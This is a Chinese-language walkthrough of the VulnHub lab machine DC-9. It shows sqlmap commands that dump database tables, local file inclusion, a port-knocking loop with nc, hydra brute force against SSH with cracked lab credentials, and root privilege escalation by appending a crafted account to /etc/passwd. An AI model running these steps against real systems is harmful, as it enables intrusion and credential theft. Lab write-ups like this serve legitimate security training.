Vulnhub靶机DC系列-DC9

Delina

原文链接：Vulnhub靶机DC系列-DC9
​
DC-9
????https://www.five86.com/downloads/DC-9.zip

---

• 
  

arp-scan -l

​

• 
  

nmap -A  -p- 192.168.237.135

​

访问HTTP

​

​

搜索栏和数据库交互爆它

​

​

​

• 
  

sqlmap -u "http://192.168.237.135/results.php" --data "search=1" --dbs

​

翻了其他表并没有什么可重要的内容，只有Staff里面有admin

• 
  

sqlmap -u "http://192.168.237.135/results.php" --data "search=1" -D Staff --tables
​

• 
  

sqlmap -u "http://192.168.237.135/results.php" --data "search=1" -D Staff -T Users --dump

​

难办啊，口算一波MD5吧，算了还是不办了
transorbital1

​

后台登陆

​

跳出个奇奇怪怪的提示

​

文件包含（LFI），也许

​

​

绝对路径越多越好
​​

​

接下来端口敲门，只有那样才能把ssh开起来，不然一直被过滤
knockd.conf默认存放路径：/etc/knockd.conf

​

不想一个个去敲就自动，在这里你可以使用nc或者任何与端口发生交互联系的执行都可以

• 
  

for x in 7469 8475 9842;do nc   192.168.237.135 $x;done

​

​

再nmap可以发现 22/tcp open
用user表的信息分别写进user.txt和pass.txt

• 
  

sqlmap -u "http://192.168.237.135/results.php" --data "search=1" -D users -T UserDetails -C "username" --dump

​

• 
  

sqlmap -u "http://192.168.237.135/results.php" --data "search=1" -D users -T UserDetails -C "password" --dump

​

用九头蛇跑

• 
  

hydra -L user.txt -P password.txt 192.168.237.135 ssh

​

chandlerb:UrAG0D!                         joeytassw0rd                         janitor:Ilovepeepee

发现janitor用户下面的一个文件夹有密码文件

​

拿出来后继续用九头蛇跑一下

• 
  

hydra -L user.txt -P backpasswd.txt 192.168.237.135 ssh

​

fredf：B4-Tru3-001

发现一个新的用户并登陆查看可特殊执行文件有哪些

​

​

是个python脚本

​

well,该脚本是把第二个文件内容写到第三个文件中去，可以写拥有root权限的账号到passwd文件里，再登陆；前提要生成加密的密码

1. perl -le 'print crypt("r00t","addedsalt")'
   
2. echo "r00t:adeZzbgrG8Ylg:0:0:root:/root:/bin/bash" > /tmp/rootcool.txt

复制代码

​

openssl也可以
执行脚本，然后登陆

• 
  

sudo /opt/devstuff/dist/test/test /tmp/rock.txt /etc/passwd

​

总结：
    1、sqlmap
    2、文件包含
    3、端口敲门
​